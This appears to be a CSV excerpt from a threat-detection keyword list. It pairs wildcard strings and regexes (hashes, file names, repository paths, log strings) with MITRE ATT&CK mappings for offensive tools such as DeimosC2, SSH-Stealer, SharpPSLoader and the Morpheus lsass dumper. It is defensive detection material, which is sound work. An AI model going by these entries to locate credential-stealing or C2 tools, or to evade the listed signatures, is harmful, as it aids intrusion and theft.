"*d5a3de19ef84c040a5b0058fb4fb2a036c9a8db7495763bcc7b7070f16cde967*",".{0,1000}d5a3de19ef84c040a5b0058fb4fb2a036c9a8db7495763bcc7b7070f16cde967.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63690"
"*d82fdd287fa45cb4f5a51540686c3224af18884a36482258dabef042d843fe81*",".{0,1000}d82fdd287fa45cb4f5a51540686c3224af18884a36482258dabef042d843fe81.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63691"
"*dad7de0b2148d5550eca6464f78d23a093048381f1583dac6254f4afd6bbbaa8*",".{0,1000}dad7de0b2148d5550eca6464f78d23a093048381f1583dac6254f4afd6bbbaa8.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63692"
"*db6746717bc58356a1fe3a5ee0e7fd35ef5f2e7a4d8f431600943d49f569e4fb*",".{0,1000}db6746717bc58356a1fe3a5ee0e7fd35ef5f2e7a4d8f431600943d49f569e4fb.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63693"
"*dd580112e193bf8ef1d110c14cf80292340dc282c639f074249ca37499ab0cfb*",".{0,1000}dd580112e193bf8ef1d110c14cf80292340dc282c639f074249ca37499ab0cfb.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63694"
"*deimos-server.ataplatform.io*",".{0,1000}deimos\-server\.ataplatform\.io.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63695"
"*DeimosC2_darwin.zip*",".{0,1000}DeimosC2_darwin\.zip.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63696"
"*DeimosC2_linux.zip*",".{0,1000}DeimosC2_linux\.zip.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63697"
"*DeimosC2_windows.zip*",".{0,1000}DeimosC2_windows\.zip.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63698"
"*DeimosC2/DeimosC2*",".{0,1000}DeimosC2\/DeimosC2.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63699"
"*e4e8b6290ee22f33081e29896b24fff357d2a66fcd8c1fbb8500ec0fa1da1b5c*",".{0,1000}e4e8b6290ee22f33081e29896b24fff357d2a66fcd8c1fbb8500ec0fa1da1b5c.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63700"
"*eaf734a532b9312168cbcbbea00d08171546bc8560b7131904bd5ea77090e9d3*",".{0,1000}eaf734a532b9312168cbcbbea00d08171546bc8560b7131904bd5ea77090e9d3.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63701"
"*efa7e067878424e9b5cd803423817bc2420b84e8bf3c8d5dee72eee849a893e5*",".{0,1000}efa7e067878424e9b5cd803423817bc2420b84e8bf3c8d5dee72eee849a893e5.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63702"
"*hashcat_shadow.txt*",".{0,1000}hashcat_shadow\.txt.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63703"
"*Println(""""C2 Server Starting*",".{0,1000}Println\(\""C2\sServer\sStarting.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#content","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63704"
"*prototype.$c2.Agent.sendJob*",".{0,1000}prototype\.\$c2\.Agent\.sendJob.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#content","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63705"
"*prototype.$c2.Listener.KillListener*",".{0,1000}prototype\.\$c2\.Listener\.KillListener.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#content","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63706"
"*\TCPAgent_Win_32_ARM.exe*",".{0,1000}\\TCPAgent_Win_32_ARM\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63707"
"*.sharepoint.com*pD9-tk*",".{0,1000}\.sharepoint\.com.{0,1000}pD9\-tk.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API - default string in file names https://x.com/Octoberfest73/status/1896596953632526504","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","https://redsiege.com/blog/2024/01/graphstrike-developer/","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","63708"
"*pD9-tK*",".{0,1000}pD9\-tK.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API - default string in file names https://x.com/Octoberfest73/status/1896596953632526504","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","#filename #sharepoint","https://redsiege.com/blog/2024/01/graphstrike-developer/","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","63709"
"*sAMAccountType=805306369*userAccountControl&2*",".{0,1000}sAMAccountType\=805306369.{0,1000}userAccountControl\&2.{0,1000}","offensive_tool_keyword","BloodHound.py","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/FalconForceTeam/FalconFriday/blob/main/0xFF-0223-BloodHound_Usage-Win.md","1","0","#ldapquery","N/A","10","8","785","95","2025-01-17T16:00:29Z","2020-08-04T10:25:37Z","63710"
"*svch0st.exe*",".{0,1000}svch0st\.exe.{0,1000}","offensive_tool_keyword","_","common masquerading technique where malware mimics the legitimate Windows system process svchost.exe by using a visually similar name","T1036.005","TA0005 ","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63711"
"*www.netexec.wiki*",".{0,1000}www\.netexec\.wiki.{0,1000}","offensive_tool_keyword","Netexec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1021 - T1087 - T1135","TA0008 - TA0007 - TA0009","N/A","N/A","Lateral Movement","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63715"
"*aircrack-ng.org*",".{0,1000}aircrack\-ng\.org.{0,1000}","offensive_tool_keyword","aircrack","Wi-Fi password cracking tool used for capturing and cracking WEP and WPA-PSK keys","T1557.002 - T1040","TA0006 - TA0009","N/A","N/A","Credential Access","N/A","1","1","N/A","N/A","8","8","N/A","N/A","N/A","N/A","63716"
"*enum4linux/enum4linux*",".{0,1000}enum4linux\/enum4linux.{0,1000}","offensive_tool_keyword","enum4linux","Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe ","T1018 - T1087.002 - T1135 - T1049 - T1033","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/CiscoCXSecurity/enum4linux","1","1","#linux","N/A","10","10","1260","243","2024-10-11T14:41:57Z","2015-07-31T21:06:03Z","63723"
"*crackstation.net*",".{0,1000}crackstation\.net.{0,1000}","offensive_tool_keyword","crackstation","online password hash cracking tool that uses a large precomputed lookup table (rainbow table) to recover plaintext passwords from their hash values - commonly used to crack credentials after hash extraction.","T1110.002 - T1111 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://crackstation.net/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63726"
"*assets.bishopfox.com*",".{0,1000}assets\.bishopfox\.com.{0,1000}","offensive_tool_keyword","sliver","hosts a variety of offensive security tools","T1059 - T1105 - T1027 - T1090.001 - T1071.001 - T1219 - T1053.005 - T1547.001","TA0002 - TA0005 - TA0011 - TA0003 - TA0008","N/A","N/A","C2","bishopfox.com","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A","63727"
"*opt.rapid7.com*",".{0,1000}opt\.rapid7\.com.{0,1000}","offensive_tool_keyword","metasploit","opt.rapid7.com is associated with Rapid7 Metasploit Framework and other security tools used for offensive security","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","63728"
"*pentest-tools.com*",".{0,1000}pentest\-tools\.com.{0,1000}","offensive_tool_keyword","pentest-tools","cloud-based offensive security platform offering a wide range of automated penetration testing utilities","T1595.002 - T1046 - T1083 - T1059 - T1190 - T1203","TA0007 - TA0001 - TA0002","N/A","N/A","Collection","pentest-tools.com","1","1","N/A","N/A","7","9","N/A","N/A","N/A","N/A","63729"
"*swisskyrepo.github.io*",".{0,1000}swisskyrepo\.github\.io.{0,1000}","offensive_tool_keyword","pentest-tools","cloud-based offensive security platform offering a wide range of automated penetration testing utilities","T1595.002 - T1046 - T1083 - T1059 - T1190 - T1203","TA0007 - TA0001 - TA0002","N/A","N/A","Collection","N/A","1","1","N/A","N/A","7","9","N/A","N/A","N/A","N/A","63730"
"*/SSH-Stealer.git*",".{0,1000}\/SSH\-Stealer\.git.{0,1000}","offensive_tool_keyword","SSH-Stealer","Smart keylogging capability to steal SSH Credentials including password & Private Key","T1056.001 - T1552.004 - T1556.004 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/DarkSpaceSecurity/SSH-Stealer","1","1","N/A","N/A","2","2","125","22","2025-03-26T04:23:00Z","2025-03-16T01:24:58Z","63736"
"*DarkSpaceSecurity/SSH-Stealer*",".{0,1000}DarkSpaceSecurity\/SSH\-Stealer.{0,1000}","offensive_tool_keyword","SSH-Stealer","Smart keylogging capability to steal SSH Credentials including password & Private Key","T1056.001 - T1552.004 - T1556.004 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/DarkSpaceSecurity/SSH-Stealer","1","1","N/A","N/A","2","2","125","22","2025-03-26T04:23:00Z","2025-03-16T01:24:58Z","63737"
"*\SSH-Stealer*",".{0,1000}\\SSH\-Stealer.{0,1000}","offensive_tool_keyword","SSH-Stealer","Smart keylogging capability to steal SSH Credentials including password & Private Key","T1056.001 - T1552.004 - T1556.004 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/DarkSpaceSecurity/SSH-Stealer","1","0","N/A","N/A","2","2","125","22","2025-03-26T04:23:00Z","2025-03-16T01:24:58Z","63738"
"*sshKeylogger.*",".{0,1000}sshKeylogger\..{0,1000}","offensive_tool_keyword","SSH-Stealer","Smart keylogging capability to steal SSH Credentials including password & Private Key","T1056.001 - T1552.004 - T1556.004 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/DarkSpaceSecurity/SSH-Stealer","1","1","N/A","N/A","2","2","125","22","2025-03-26T04:23:00Z","2025-03-16T01:24:58Z","63739"
"*/sshKeylogger/*",".{0,1000}\/sshKeylogger\/.{0,1000}","offensive_tool_keyword","SSH-Stealer","Smart keylogging capability to steal SSH Credentials including password & Private Key","T1056.001 - T1552.004 - T1556.004 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/DarkSpaceSecurity/SSH-Stealer","1","1","N/A","N/A","2","2","125","22","2025-03-26T04:23:00Z","2025-03-16T01:24:58Z","63740"
"*aed15bd2e969003861e3389c83b8236b28d95ff77bbd0a190cd1a322cc349417*",".{0,1000}aed15bd2e969003861e3389c83b8236b28d95ff77bbd0a190cd1a322cc349417.{0,1000}","offensive_tool_keyword","SSH-Stealer","Smart keylogging capability to steal SSH Credentials including password & Private Key","T1056.001 - T1552.004 - T1556.004 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/DarkSpaceSecurity/SSH-Stealer","1","0","#filehash","N/A","2","2","125","22","2025-03-26T04:23:00Z","2025-03-16T01:24:58Z","63741"
"*29766e882e55554b32f415da20cbbc3165ade2472cb0ffe6c281b0f68621bb98*",".{0,1000}29766e882e55554b32f415da20cbbc3165ade2472cb0ffe6c281b0f68621bb98.{0,1000}","offensive_tool_keyword","SSH-Stealer","Smart keylogging capability to steal SSH Credentials including password & Private Key","T1056.001 - T1552.004 - T1556.004 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/DarkSpaceSecurity/SSH-Stealer","1","0","#filehash","N/A","2","2","125","22","2025-03-26T04:23:00Z","2025-03-16T01:24:58Z","63742"
"*86cfb31b-69ae-483e-8dd9-f8f5a82aef13*",".{0,1000}86cfb31b\-69ae\-483e\-8dd9\-f8f5a82aef13.{0,1000}","offensive_tool_keyword","SSH-Stealer","Smart keylogging capability to steal SSH Credentials including password & Private Key","T1056.001 - T1552.004 - T1556.004 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/DarkSpaceSecurity/SSH-Stealer","1","0","#GUIDproject","N/A","2","2","125","22","2025-03-26T04:23:00Z","2025-03-16T01:24:58Z","63743"
"*/SharpPSLoader.git*",".{0,1000}\/SharpPSLoader\.git.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","1","N/A","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63744"
"*ChoiSG/SharpPSLoader*",".{0,1000}ChoiSG\/SharpPSLoader.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","1","N/A","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63745"
"*SharpPSLoader.exe*",".{0,1000}SharpPSLoader\.exe.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","1","N/A","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63746"
"*SharpPSLoaderConsole.exe*",".{0,1000}SharpPSLoaderConsole\.exe.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","1","N/A","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63747"
"*2016-2021 ?Denis Kuzmin [x-3F@outlook.com]*",".{0,1000}2016\-2021\s\?Denis\sKuzmin\s\[x\-3F\@outlook\.com\].{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","0","#content","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63748"
"*5a5b23354e72ec44374c0cfb7d9fc6123b681c1651fa201ded7fc602ecfa05c1*",".{0,1000}5a5b23354e72ec44374c0cfb7d9fc6123b681c1651fa201ded7fc602ecfa05c1.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","0","#filehash","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63749"
"*4EA75F8D-F287-47E4-B698-931D90A3A85C*",".{0,1000}4EA75F8D\-F287\-47E4\-B698\-931D90A3A85C.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","0","#GUIDproject","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63750"
"*6D3BF3CF-1137-4609-9934-8309261F710E*",".{0,1000}6D3BF3CF\-1137\-4609\-9934\-8309261F710E.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","0","#GUIDproject","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63751"
"*Invoke-SingleByteXOR*",".{0,1000}Invoke\-SingleByteXOR.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","1","N/A","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63752"
"*Invoke-Bloodhound*",".{0,1000}Invoke\-Bloodhound.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","1","N/A","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63753"
"*[+] Disabled ETW Tracing*",".{0,1000}\[\+\]\sDisabled\sETW\sTracing.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","0","#content","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63754"
"*[+] Disabled AMSI*",".{0,1000}\[\+\]\sDisabled\sAMSI.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","0","#content","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63755"
"*SharpPSLoaderConsole.SharpPSLoaderConsole*",".{0,1000}SharpPSLoaderConsole\.SharpPSLoaderConsole.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","0","#content","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63756"
"*Powersharppack -sharpup audit*",".{0,1000}Powersharppack\s\-sharpup\saudit.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","0","N/A","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63757"
"*/Chrome-Password-Recovery.git*",".{0,1000}\/Chrome\-Password\-Recovery\.git.{0,1000}","offensive_tool_keyword","Chrome-Password-Recovery","recover Google Chrome Logins","T1555.003 - T1005 - T1027","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/SaturnsVoid/Chrome-Password-Recovery","1","1","N/A","N/A","8","1","75","31","2021-02-05T00:36:39Z","2017-04-07T17:32:27Z","63758"
"*SaturnsVoid/Chrome-Password-Recovery*",".{0,1000}SaturnsVoid\/Chrome\-Password\-Recovery.{0,1000}","offensive_tool_keyword","Chrome-Password-Recovery","recover Google Chrome Logins","T1555.003 - T1005 - T1027","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/SaturnsVoid/Chrome-Password-Recovery","1","1","N/A","N/A","8","1","75","31","2021-02-05T00:36:39Z","2017-04-07T17:32:27Z","63759"
"*Chrome Password Recovery.go*",".{0,1000}Chrome\sPassword\sRecovery\.go.{0,1000}","offensive_tool_keyword","Chrome-Password-Recovery","recover Google Chrome Logins","T1555.003 - T1005 - T1027","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/SaturnsVoid/Chrome-Password-Recovery","1","1","N/A","N/A","8","1","75","31","2021-02-05T00:36:39Z","2017-04-07T17:32:27Z","63760"
"*7eb6b7bb1ae807bb1610715069bde4c790d698924926eb8e9a59ce41e2dc327f*",".{0,1000}7eb6b7bb1ae807bb1610715069bde4c790d698924926eb8e9a59ce41e2dc327f.{0,1000}","offensive_tool_keyword","Chrome-Password-Recovery","recover Google Chrome Logins","T1555.003 - T1005 - T1027","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/SaturnsVoid/Chrome-Password-Recovery","1","0","#filehash","N/A","8","1","75","31","2021-02-05T00:36:39Z","2017-04-07T17:32:27Z","63761"
"*Aur3ns/lsassStealer*",".{0,1000}Aur3ns\/lsassStealer.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/lsassStealer","1","1","N/A","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63762"
"*Aur3ns/Morpheus*",".{0,1000}Aur3ns\/Morpheus.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/Morpheus","1","1","N/A","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63763"
"*[+] Decoded target process: lsass.exe*",".{0,1000}\[\+\]\sDecoded\starget\sprocess\:\slsass\.exe.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/Morpheus","1","0","#content","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63764"
"*Set-ExecutionPolicy Bypass -Scope Process -Force; ./run.ps1*",".{0,1000}Set\-ExecutionPolicy\sBypass\s\-Scope\sProcess\s\-Force\;\s\.\/run\.ps1.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/Morpheus","1","0","N/A","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63765"
"*\memdump.exe*",".{0,1000}\\memdump\.exe.{0,1000}","offensive_tool_keyword","Morpheus","Morpheus is a memory dumper that extracts lsass.exe in RAM and exfiltrates it via forged NTP packets","T1003.001 - T1043 - T1041 - T1027","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/Aur3ns/Morpheus","1","0","N/A","N/A","8","1","89","15","2025-04-05T17:35:13Z","2024-12-15T16:02:49Z","63766"
